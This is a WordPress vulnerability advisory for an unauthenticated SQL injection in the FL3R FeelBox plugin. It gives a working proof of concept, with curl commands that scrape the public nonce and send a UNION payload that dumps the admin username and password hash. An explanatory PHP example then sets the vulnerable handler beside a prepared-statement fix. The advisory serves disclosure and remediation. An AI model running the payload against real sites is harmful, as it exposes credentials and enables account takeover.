WordPress Plugin Vulnerabilities
FL3R FeelBox <= 8.1 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Proof of Concept
1. Visit a blog post and extract the nonce from the source (search for "feelboxAjax", and extract the "token"):
   curl -s 'http://127.0.0.1:7777/?p=1' | grep 'token'
2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first user's username and password hash:
   curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_post' \
     --data 'token=<NONCE HERE>&postID=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -'
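The root cause described above is a request parameter concatenated into SQL inside an AJAX handler that is registered for unauthenticated visitors. The following is an added example, not the FL3R FeelBox plugin's own code: it shows that vulnerable pattern next to a hardened version that validates the value and binds it through $wpdb->prepare(). The action name "populate_post" and the "postID" and "token" parameters are taken from the advisory; the function names, nonce action name and the query itself are assumptions.

```php
<?php
// Added example (hypothetical handler, not the plugin's real code). The action and
// parameter names come from the advisory; everything else is assumed.

// Vulnerable pattern: postID is dropped straight into the SQL string. Because the
// handler is hooked on wp_ajax_nopriv_*, any visitor who can reach admin-ajax.php
// controls part of the query. The nonce does not help: it is readable from the
// public page source, so it only proves the request came from a rendered page.
function feelbox_populate_post_vulnerable() {
    global $wpdb;
    $post_id = $_POST['postID'];
    $row = $wpdb->get_row(
        "SELECT ID, post_title, post_content FROM {$wpdb->posts} WHERE ID = $post_id"
    );
    wp_send_json( $row );
}
// Shown for contrast only; intentionally not registered with add_action().

// Hardened version: validate the type and let $wpdb->prepare() bind the value.
function feelbox_populate_post_fixed() {
    global $wpdb;

    // Nonce check is defence in depth (CSRF), not the SQL injection fix.
    // 'feelbox_nonce' is an assumed action name; 'token' is the request field.
    check_ajax_referer( 'feelbox_nonce', 'token' );

    // absint() coerces to a non-negative integer; anything non-numeric becomes 0.
    $post_id = isset( $_POST['postID'] ) ? absint( $_POST['postID'] ) : 0;
    if ( 0 === $post_id ) {
        wp_send_json_error( 'invalid postID', 400 );
    }

    // %d binds an integer placeholder, so attacker-controlled text never
    // becomes part of the SQL statement.
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT ID, post_title, post_content FROM {$wpdb->posts} WHERE ID = %d",
            $post_id
        )
    );
    if ( null === $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    wp_send_json_success( $row );
}
add_action( 'wp_ajax_nopriv_populate_post', 'feelbox_populate_post_fixed' );
add_action( 'wp_ajax_populate_post', 'feelbox_populate_post_fixed' );
```

Two checks are worth keeping separate when reviewing a handler like this: the nonce guards the request's origin, while the prepared statement (plus absint() for a numeric ID) guards the query. A plugin that only has the first is still injectable by anyone who views a page.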
Classification
Type
SQLI
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Verified
Yes
Timeline
Publicly Published
2023-01-20
Added
2023-01-20
Last Updated
2023-01-20